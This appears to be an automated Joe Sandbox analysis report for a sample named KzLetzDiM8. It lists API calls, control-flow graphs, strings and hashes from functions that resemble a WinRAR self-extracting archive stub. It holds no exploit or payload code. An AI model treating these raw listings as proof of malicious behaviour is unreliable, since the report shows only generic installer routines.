                                                            • _swprintf.LIBCMT ref: 001FBAC2
                                                            • GetLastError.KERNEL32(?,00000011), ref: 001FBAF4
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 001FBB43
                                                            • _swprintf.LIBCMT ref: 001FBB7C
                                                            • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 001FBBD0
                                                            • GetCommandLineW.KERNEL32 ref: 001FBBEA
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 001FBC47
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 001FBC6F
                                                            • Sleep.KERNEL32(00000064), ref: 001FBCB9
                                                            • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 001FBCE2
                                                            • CloseHandle.KERNEL32(00000000), ref: 001FBCEB
                                                            • _swprintf.LIBCMT ref: 001FBD1E
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FBD7D
                                                            • SetDlgItemTextW.USER32(?,00000065,002135F4), ref: 001FBD94
                                                            • GetDlgItem.USER32(?,00000065), ref: 001FBD9D
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001FBDAC
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001FBDBB
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FBE68
                                                            • _wcslen.LIBCMT ref: 001FBEBE
                                                            • _swprintf.LIBCMT ref: 001FBEE8
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 001FBF32
                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 001FBF4C
                                                            • GetDlgItem.USER32(?,00000068), ref: 001FBF55
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 001FBF6B
                                                            • GetDlgItem.USER32(?,00000066), ref: 001FBF85
                                                            • SetWindowTextW.USER32(00000000,0022A472), ref: 001FBFA7
                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 001FC007
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FC01A
                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 001FC0BD
                                                            • EnableWindow.USER32(00000000,00000000), ref: 001FC197
                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 001FC1D9
                                                              • Part of subcall function 001FC73F: __EH_prolog.LIBCMT ref: 001FC744
                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 001FC1FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$Q!
                                                            • API String ID: 3829768659-2003956012
                                                            • Opcode ID: 9b8b1b230a76f39322f5953d013a6dd77b8d0cce57f3ae71a2e7eca16333f813
                                                            • Instruction ID: 74a4090a8b3139d5cdab5c5c6d0f55970fe9eba3afa0c72bce552ddd6a37fda1
                                                            • Opcode Fuzzy Hash: 9b8b1b230a76f39322f5953d013a6dd77b8d0cce57f3ae71a2e7eca16333f813
                                                            • Instruction Fuzzy Hash: B642F87194424CBAEB21EBB0ED8EFBE77BCAB26700F004155F745A60D2CB749A45CB61
                                                            Function 001F0863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316libraryfileloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 268 1f0863-1f0886 call 1fec50 GetModuleHandleW 271 1f0888-1f089f GetProcAddress 268->271 272 1f08e7-1f0b48 268->272 275 1f08b9-1f08c9 GetProcAddress 271->275 276 1f08a1-1f08b7 271->276 273 1f0b4e-1f0b59 call 2075fb 272->273 274 1f0c14-1f0c40 GetModuleFileNameW call 1ec29a call 1f0602 272->274 273->274 286 1f0b5f-1f0b8d GetModuleFileNameW CreateFileW 273->286 291 1f0c42-1f0c4e call 1eb146 274->291 279 1f08cb-1f08e0 275->279 280 1f08e5 275->280 276->275 279->280 280->272 288 1f0b8f-1f0b9b SetFilePointer 286->288 289 1f0c08-1f0c0f CloseHandle 286->289 288->289 292 1f0b9d-1f0bb9 ReadFile 288->292 289->274 298 1f0c7d-1f0ca4 call 1ec310 GetFileAttributesW 291->298 299 1f0c50-1f0c5b call 1f081b 291->299 292->289 294 1f0bbb-1f0be0 292->294 296 1f0bfd-1f0c06 call 1f0371 294->296 296->289 304 1f0be2-1f0bfc call 1f081b 296->304 306 1f0cae 298->306 307 1f0ca6-1f0caa 298->307 299->298 309 1f0c5d-1f0c7b CompareStringW 299->309 304->296 311 1f0cb0-1f0cb5 306->311 307->291 310 1f0cac 307->310 309->298 309->307 310->311 313 1f0cec-1f0cee 311->313 314 1f0cb7 311->314 316 1f0dfb-1f0e05 313->316 317 1f0cf4-1f0d0b call 1ec2e4 call 1eb146 313->317 315 1f0cb9-1f0ce0 call 1ec310 GetFileAttributesW 314->315 323 1f0cea 315->323 324 1f0ce2-1f0ce6 315->324 327 1f0d0d-1f0d6e call 1f081b * 2 call 1ee617 call 1e4092 call 1ee617 call 1fa7e4 317->327 328 1f0d73-1f0da6 call 1e4092 AllocConsole 317->328 323->313 324->315 326 1f0ce8 324->326 326->313 334 1f0df3-1f0df5 ExitProcess 327->334 333 1f0da8-1f0ded GetCurrentProcessId AttachConsole call 203e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 001F087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 001F088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 001F08BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001F0B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001F0B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001F0B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,|<!,00000000), ref: 001F0BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 001F0C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001F0C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<!,?,00000000,?,00000800), ref: 001F0C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,|<!,00000800,?,00000000,?,00000800), ref: 001F0C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,D=!,00000800), ref: 001F0CD8
                                                              • Part of subcall function 001F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                              • Part of subcall function 001F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            • _swprintf.LIBCMT ref: 001F0D4A
                                                            • _swprintf.LIBCMT ref: 001F0D96
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • AllocConsole.KERNEL32 ref: 001F0D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 001F0DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 001F0DAF
                                                            • _wcslen.LIBCMT ref: 001F0DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 001F0DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 001F0DDC
                                                            • Sleep.KERNEL32(00002710), ref: 001F0DE7
                                                            • FreeConsole.KERNEL32 ref: 001F0DED
                                                            • ExitProcess.KERNEL32 ref: 001F0DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: (=!$,<!$,@!$0?!$0A!$4B!$8>!$D=!$DXGIDebug.dll$H?!$H@!$HA!$P>!$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=!$`@!$d?!$dA!$dwmapi.dll$h=!$h>!$kernel32$uxtheme.dll$|<!$|?!$|@!$<!$>!$?!$@!$A!
                                                            • API String ID: 1207345701-1524096085
                                                            • Opcode ID: e0ff5b6c36a81a22b4835499f04444fc5aadc0289c3545b21f85ae69e4840bfd
                                                            • Instruction ID: 1dcaa7f18528f51e4f7e652f7cdb4c602f3a405c4bc6b7c07a66e822f31dad93
                                                            • Opcode Fuzzy Hash: e0ff5b6c36a81a22b4835499f04444fc5aadc0289c3545b21f85ae69e4840bfd
                                                            • Instruction Fuzzy Hash: 79D1B4B1418384AFD731EF50D848BDFBAE9BFA9704F50491DF68896141CBB08699CB92
                                                            Function 001FC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 347 1fc73f-1fc757 call 1feb78 call 1fec50 352 1fd40d-1fd418 347->352 353 1fc75d-1fc787 call 1fb314 347->353 353->352 356 1fc78d-1fc792 353->356 357 1fc793-1fc7a1 356->357 358 1fc7a2-1fc7b7 call 1faf98 357->358 361 1fc7b9 358->361 362 1fc7bb-1fc7d0 call 1f1fbb 361->362 365 1fc7dd-1fc7e0 362->365 366 1fc7d2-1fc7d6 362->366 368 1fd3d9-1fd404 call 1fb314 365->368 369 1fc7e6 365->369 366->362 367 1fc7d8 366->367 367->368 368->357 381 1fd40a-1fd40c 368->381 371 1fca5f-1fca61 369->371 372 1fc9be-1fc9c0 369->372 373 1fc7ed-1fc7f0 369->373 374 1fca7c-1fca7e 369->374 371->368 375 1fca67-1fca77 SetWindowTextW 371->375 372->368 378 1fc9c6-1fc9d2 372->378 373->368 379 1fc7f6-1fc850 call 1fa64d call 1ebdf3 call 1ea544 call 1ea67e call 1e6edb 373->379 374->368 376 1fca84-1fca8b 374->376 375->368 376->368 380 1fca91-1fcaaa 376->380 382 1fc9e6-1fc9eb 378->382 383 1fc9d4-1fc9e5 call 207686 378->383 436 1fc98f-1fc9a4 call 1ea5d1 379->436 387 1fcaac 380->387 388 1fcab2-1fcac0 call 203e13 380->388 381->352 385 1fc9ed-1fc9f3 382->385 386 1fc9f5-1fca00 call 1fb48e 382->386 383->382 392 1fca05-1fca07 385->392 386->392 387->388 388->368 401 1fcac6-1fcacf 388->401 398 1fca09-1fca10 call 203e13 392->398 399 1fca12-1fca32 call 203e13 call 203e3e 392->399 398->399 424 1fca4b-1fca4d 399->424 425 1fca34-1fca3b 399->425 405 1fcaf8-1fcafb 401->405 406 1fcad1-1fcad5 401->406 411 1fcb01-1fcb04 405->411 413 1fcbe0-1fcbee call 1f0602 405->413 410 1fcad7-1fcadf 406->410 406->411 410->368 416 1fcae5-1fcaf3 call 1f0602 410->416 418 1fcb06-1fcb0b 411->418 419 1fcb11-1fcb2c 411->419 426 1fcbf0-1fcc04 call 20279b 413->426 416->426 418->413 418->419 437 1fcb2e-1fcb68 419->437 438 1fcb76-1fcb7d 419->438 424->368 427 1fca53-1fca5a call 203e2e 424->427 431 1fca3d-1fca3f 425->431 432 1fca42-1fca4a call 207686 425->432 446 1fcc06-1fcc0a 426->446 447 1fcc11-1fcc62 call 1f0602 call 1fb1be GetDlgItem SetWindowTextW SendMessageW call 203e49 426->447 427->368 431->432 432->424 453 1fc9aa-1fc9b9 call 1ea55a 436->453 454 1fc855-1fc869 SetFileAttributesW 436->454 464 1fcb6c-1fcb6e 437->464 465 1fcb6a 437->465 440 1fcb7f-1fcb97 call 203e13 438->440 441 1fcbab-1fcbce call 203e13 * 2 438->441 440->441 458 1fcb99-1fcba6 call 1f05da 440->458 441->426 475 1fcbd0-1fcbde call 1f05da 441->475 446->447 452 1fcc0c-1fcc0e 446->452 483 1fcc67-1fcc6b 447->483 452->447 453->368 460 1fc90f-1fc91f GetFileAttributesW 454->460 461 1fc86f-1fc8a2 call 1eb991 call 1eb690 call 203e13 454->461 458->441 460->436 470 1fc921-1fc930 DeleteFileW 460->470 490 1fc8b5-1fc8c3 call 1ebdb4 461->490 491 1fc8a4-1fc8b3 call 203e13 461->491 464->438 465->464 470->436 474 1fc932-1fc935 470->474 478 1fc939-1fc965 call 1e4092 GetFileAttributesW 474->478 475->426 487 1fc937-1fc938 478->487 488 1fc967-1fc97d MoveFileW 478->488 483->368 484 1fcc71-1fcc85 SendMessageW 483->484 484->368 487->478 488->436 492 1fc97f-1fc989 MoveFileExW 488->492 490->453 497 1fc8c9-1fc908 call 203e13 call 1ffff0 490->497 491->490 491->497 492->436 497->460
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001FC744
                                                              • Part of subcall function 001FB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 001FB3FB
                                                              • Part of subcall function 001FAF98: _wcschr.LIBVCRUNTIME ref: 001FB033
                                                            • _wcslen.LIBCMT ref: 001FCA0A
                                                            • _wcslen.LIBCMT ref: 001FCA13
                                                            • SetWindowTextW.USER32(?,?), ref: 001FCA71
                                                            • _wcslen.LIBCMT ref: 001FCAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 001FCBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 001FCC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 001FCC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0022A472), ref: 001FCC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001FCC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 986293930-312220925
                                                            • Opcode ID: 8937651ff217a1907f9813c3ce64e13e7933ff7e83a0f38628b82b6426689237
                                                            • Instruction ID: 33bce2f14f7ce96513688ef7c90e09535ba54af67ef8afbbad038ef95e585f89
                                                            • Opcode Fuzzy Hash: 8937651ff217a1907f9813c3ce64e13e7933ff7e83a0f38628b82b6426689237
                                                            • Instruction Fuzzy Hash: D3E151B290021DAADB24DBA0ED85EFE73BCAF14350F4441A6F709E3051EB749A849F60
                                                            Function 001EDA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001EDA70
                                                            • _wcschr.LIBVCRUNTIME ref: 001EDA91
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 001EDAAC
                                                              • Part of subcall function 001EC29A: _wcslen.LIBCMT ref: 001EC2A2
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                              • Part of subcall function 001F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001EBAE9,00000000,?,?,?,00010412), ref: 001F1BA0
                                                            • _wcslen.LIBCMT ref: 001EDDE9
                                                            • __fprintf_l.LIBCMT ref: 001EDF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9!
                                                            • API String ID: 557298264-4042292296
                                                            • Opcode ID: 58a4b6d01276e65f8eded664a23decdee4209ead69e98027c6a95388c6785689
                                                            • Instruction ID: 01883b5c6bea6bcb43c5c3340c48475fa81d2ad80a227a3a697abc3b464ecc01
                                                            • Opcode Fuzzy Hash: 58a4b6d01276e65f8eded664a23decdee4209ead69e98027c6a95388c6785689
                                                            • Instruction Fuzzy Hash: E2320071A00688EBCF28EF65DC45AEE77E9FF18700F40011AFA0597291EBB19D95CB50
                                                            Function 001FD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001FB579
                                                              • Part of subcall function 001FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FB58A
                                                              • Part of subcall function 001FB568: IsDialogMessageW.USER32(00010412,?), ref: 001FB59E
                                                              • Part of subcall function 001FB568: TranslateMessage.USER32(?), ref: 001FB5AC
                                                              • Part of subcall function 001FB568: DispatchMessageW.USER32(?), ref: 001FB5B6
                                                            • GetDlgItem.USER32(00000068,0023FCB8), ref: 001FD4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,001FAF07,00000001,?,?,001FB7B9,0021506C,0023FCB8,0023FCB8,00001000,00000000,00000000), ref: 001FD510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 001FD51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,002135F4), ref: 001FD529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 001FD559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 001FD5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 001FD5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 001FD5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,002143F4), ref: 001FD5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: f2e4188ea32006623509f51e174c5786058f13c9eddee07459d6a52a84bde9b6
                                                            • Instruction ID: 542460033557714eef84e850cf389323403dc04da0d6a5e67d79938a7fc77fb5
                                                            • Opcode Fuzzy Hash: f2e4188ea32006623509f51e174c5786058f13c9eddee07459d6a52a84bde9b6
                                                            • Instruction Fuzzy Hash: B5319E71145346BBE311EF20EC4EFAB7FACEB96708F000618F652D61A0DBA59A05C776
                                                            Function 001FD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 836 1fd78f-1fd7a7 call 1fec50 839 1fd7ad-1fd7b9 call 203e13 836->839 840 1fd9e8-1fd9f0 836->840 839->840 843 1fd7bf-1fd7e7 call 1ffff0 839->843 846 1fd7e9 843->846 847 1fd7f1-1fd7ff 843->847 846->847 848 1fd812-1fd818 847->848 849 1fd801-1fd804 847->849 850 1fd85b-1fd85e 848->850 851 1fd808-1fd80e 849->851 850->851 852 1fd860-1fd866 850->852 853 1fd837-1fd844 851->853 854 1fd810 851->854 857 1fd86d-1fd86f 852->857 858 1fd868-1fd86b 852->858 855 1fd84a-1fd84e 853->855 856 1fd9c0-1fd9c2 853->856 859 1fd822-1fd82c 854->859 862 1fd9c6 855->862 863 1fd854-1fd859 855->863 856->862 864 1fd882-1fd898 call 1eb92d 857->864 865 1fd871-1fd878 857->865 858->857 858->864 860 1fd82e 859->860 861 1fd81a-1fd820 859->861 860->853 861->859 866 1fd830-1fd833 861->866 869 1fd9cf 862->869 863->850 871 1fd89a-1fd8a7 call 1f1fbb 864->871 872 1fd8b1-1fd8bc call 1ea231 864->872 865->864 867 1fd87a 865->867 866->853 867->864 873 1fd9d6-1fd9d8 869->873 871->872 881 1fd8a9 871->881 882 1fd8be-1fd8d5 call 1eb6c4 872->882 883 1fd8d9-1fd8e6 ShellExecuteExW 872->883 876 1fd9da-1fd9dc 873->876 877 1fd9e7 873->877 876->877 880 1fd9de-1fd9e1 ShowWindow 876->880 877->840 880->877 881->872 882->883 883->877 885 1fd8ec-1fd8f9 883->885 887 1fd90c-1fd90e 885->887 888 1fd8fb-1fd902 885->888 890 1fd925-1fd944 call 1fdc3b 887->890 891 1fd910-1fd919 887->891 888->887 889 1fd904-1fd90a 888->889 889->887 892 1fd97b-1fd987 CloseHandle 889->892 890->892 905 1fd946-1fd94e 890->905 891->890 897 1fd91b-1fd923 ShowWindow 891->897 895 1fd989-1fd996 call 1f1fbb 892->895 896 1fd998-1fd9a6 892->896 895->869 895->896 896->873 898 1fd9a8-1fd9aa 896->898 897->890 898->873 902 1fd9ac-1fd9b2 898->902 902->873 904 1fd9b4-1fd9be 902->904 904->873 905->892 906 1fd950-1fd961 GetExitCodeProcess 905->906 906->892 907 1fd963-1fd96d 906->907 908 1fd96f 907->908 909 1fd974 907->909 908->909 909->892
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001FD7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 001FD8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 001FD91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 001FD959
                                                            • CloseHandle.KERNEL32(?), ref: 001FD97F
                                                            • ShowWindow.USER32(?,00000001), ref: 001FD9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: 7c08cd0d062c75dddb3d9c9cc3c52ff343835b375a446849fa8e89bdc3acabd0
                                                            • Instruction ID: 482c568dea977895f6732502f242c030eac2c999609dc87d83278e95184554d4
                                                            • Opcode Fuzzy Hash: 7c08cd0d062c75dddb3d9c9cc3c52ff343835b375a446849fa8e89bdc3acabd0
                                                            • Instruction Fuzzy Hash: 6E51D471404388AADB31DF64F844BBBBBE6BF92788F04041EF6C5971A1D7B18985CB52
                                                            Function 00203B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 910 203b72-203b7c 911 203bee-203bf1 910->911 912 203bf3 911->912 913 203b7e-203b8c 911->913 914 203bf5-203bf9 912->914 915 203b95-203bb1 LoadLibraryExW 913->915 916 203b8e-203b91 913->916 919 203bb3-203bbc GetLastError 915->919 920 203bfa-203c00 915->920 917 203b93 916->917 918 203c09-203c0b 916->918 922 203beb 917->922 918->914 923 203be6-203be9 919->923 924 203bbe-203bd3 call 206088 919->924 920->918 921 203c02-203c03 FreeLibrary 920->921 921->918 922->911 923->922 924->923 927 203bd5-203be4 LoadLibraryExW 924->927 927->920 927->923
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,00203C35,00000000,00000FA0,00242088,00000000,?,00203D60,00000004,InitializeCriticalSectionEx,00216394,InitializeCriticalSectionEx,00000000), ref: 00203C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
